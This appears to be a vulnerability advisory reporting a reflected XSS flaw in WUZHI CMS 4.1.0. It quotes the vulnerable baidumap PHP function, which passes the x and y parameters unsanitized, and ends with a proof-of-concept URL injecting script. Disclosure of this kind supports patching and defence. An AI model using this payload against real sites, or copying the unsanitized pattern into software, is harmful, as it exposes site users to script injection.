A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the x or y parameter of /index.php?m=core&f=map&v=baidumap
Vulnerability file: coreframe/app/core/map.php
public function baidumap() {
$map_x = isset($GLOBALS['x']) && !empty($GLOBALS['x']) ? $GLOBALS['x'] : 116;
$map_y = isset($GLOBALS['y']) && !empty($GLOBALS['y']) ? $GLOBALS['y'] : 39;
$map_zoom = isset($GLOBALS['zoom']) && !empty($GLOBALS['zoom']) ? $GLOBALS['zoom'] : 12;
if(($map_x=='116' || $map_x=='0.000000') && !empty($GLOBALS['address'])) {
$address = $GLOBALS['address'];
} else {
$address = '';
}
include T('map','baidumap');
}
PoC:
http://example.com/index.php?m=core&f=map&v=baidumap&x=alert(1)&y=alert(2)